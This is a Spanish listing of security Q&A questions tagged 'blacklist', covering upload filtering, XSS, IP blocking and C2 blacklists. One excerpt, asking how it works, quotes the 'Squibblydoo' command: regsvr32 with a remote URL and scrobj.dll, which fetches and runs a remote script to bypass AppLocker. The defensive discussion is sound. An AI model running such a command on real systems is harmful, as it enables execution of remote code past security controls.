Preguntas con etiqueta 'blacklist'

preguntas con etiqueta
4
respuestas

Hacer una lista negra de tipos de archivo para proteger la aplicación PHP

Estoy trabajando en un sistema PHP donde el usuario puede cargar archivos. Estoy tratando de proteger el sistema de códigos maliciosos, por lo que estoy pensando en algún tipo de lista negra de archivos que debo bloquear de la carga. Sé qu...
hecha 31.01.2016 - 19:55
5
respuestas

Lista negra vs. caracteres de lista blanca para evitar XSS

He estado leyendo acerca de la prevención XSS en OWASP y otros canales de seguridad. Todos dicen que debo usar ESAPI o una biblioteca similar y hacer el filtrado de entrada a través de un enfoque de lista blanca. Sin embargo, uso un marco (We...
hecha 13.09.2012 - 18:30
2
respuestas

Lista negra de direcciones IP: ¿cuándo debemos actuar?

Soy responsable de proteger un entorno de AWS y estoy notando varios ataques de reconocimiento contra el entorno. Tenemos la opción de bloquear las direcciones IP en nuestro firewall, pero el entorno se escanea con diferentes ataques varias vece...
hecha 30.11.2015 - 20:26
1
respuesta

¿Cómo funciona este bypass de AppLocker exactamente? ("Squibblydoo")

He leído en algunos blogs acerca de un truco llamado "Squibblydoo", donde el siguiente comando puede omitir el Windows AppLocker: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll Donde la URL apunta a un archivo de secuencia de comandos q...
hecha 05.04.2018 - 20:54
1
respuesta

¿Cómo defenderse contra un ataque DOS de Spoofed-IP Blacklist?

Así que implementé una lista negra de IP para el punto final /login en mi servidor. Si alguna IP no puede iniciar sesión más de x número de intentos en x número de minutos, la IP solicitada se encuentra en la lista negra...
hecha 25.12.2015 - 02:20
1
respuesta

¿El filtrado de flash se basa en el tipo MIME suficiente para mantenerlo fuera?

Como flash es un verdadero desastre de seguridad, comencé a incluir en la lista negra flash en nuestro proxy bloqueando cualquier contenido con el tipo mime application/x-shockwave-flash que funciona bastante bien hasta donde puedo decir....
hecha 18.07.2016 - 23:28
2
respuestas

¿Se conocen estadísticas de contraseñas utilizadas durante los ataques de contraseñas de fuerza bruta?

He estado leyendo bastante acerca de los ataques de fuerza bruta y me pregunto si las contraseñas que se usan en dichos ataques deben mantenerse para evitar que mis usuarios tengan esas contraseñas, ya que esos sistemas de fuerza bruta verificad...
hecha 13.01.2016 - 08:59
2
respuestas

Eliminar el dominio de las listas negras de filtros web

Un dominio con un pasado de cuadros Trabajo en una empresa que compró un dominio .com hace aproximadamente un año y ahora usa este dominio para su sitio web y correo electrónico. Sin embargo, el propietario anterior tenía un sitio (el últim...
hecha 12.12.2017 - 20:53
1
respuesta

¿Existen prácticas estándar para proteger contra el ingreso de enlaces maliciosos en forma pública?

Un sitio web en el que estoy trabajando necesita tener un formulario para que cualquier visitante envíe una solicitud de información sobre un servicio. El usuario no necesitará crear una cuenta, y los detalles de contacto son solo una parte del...
hecha 17.05.2016 - 04:36
1
respuesta

¿Cuál es la vida útil de un C2?

He estado trabajando en la configuración de listas negras dinámicas, y una pregunta que surgió es cuánto tiempo deben mantenerse las entradas típicas en una lista negra. En interés de la equidad, obviamente debería haber algún momento en el que...
hecha 26.07.2016 - 20:02